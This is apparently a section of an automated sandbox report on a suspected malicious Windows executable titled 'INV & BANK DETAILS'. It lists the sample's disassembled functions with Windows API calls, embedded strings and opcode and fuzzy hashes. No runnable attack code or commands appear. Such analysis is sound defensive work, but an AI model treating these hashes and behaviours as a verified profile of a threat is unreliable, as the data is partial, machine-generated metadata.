                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                • String ID:
                                • API String ID: 1454798553-0
                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _strncmp
                                • String ID: Q\E
                                • API String ID: 909875538-2189900498
                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                APIs
                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                • String ID: AutoIt3GUI$Container
                                • API String ID: 2652923123-3941886329
                                • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove_strncmp
                                • String ID: U$\
                                • API String ID: 2666721431-100911408
                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                APIs
                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                • __wcsnicmp.LIBCMT ref: 00467288
                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                • String ID: LPT
                                • API String ID: 3035604524-1350329615
                                • Opcode ID: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                • Opcode Fuzzy Hash: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \$h
                                • API String ID: 4104443479-677774858
                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID: &
                                • API String ID: 2931989736-1010288
                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \
                                • API String ID: 4104443479-2967466578
                                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                APIs
                                • _wcslen.LIBCMT ref: 00466825
                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CrackInternet_wcslen
                                • String ID: |
                                • API String ID: 596671847-2343686810
                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                APIs
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: '
                                • API String ID: 3850602802-1997036262
                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                APIs
                                • _strlen.LIBCMT ref: 0040F858
                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                • _sprintf.LIBCMT ref: 0040F9AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove$_sprintf_strlen
                                • String ID: %02X
                                • API String ID: 1921645428-436463671
                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: htonsinet_addr
                                • String ID: 255.255.255.255
                                • API String ID: 3832099526-2422070025
                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: InternetOpen
                                • String ID: <local>
                                • API String ID: 2038078732-4266983199
                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: u,D
                                • API String ID: 4104443479-3858472334
                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                APIs
                                • _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • _memmove.LIBCMT ref: 00401B57
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
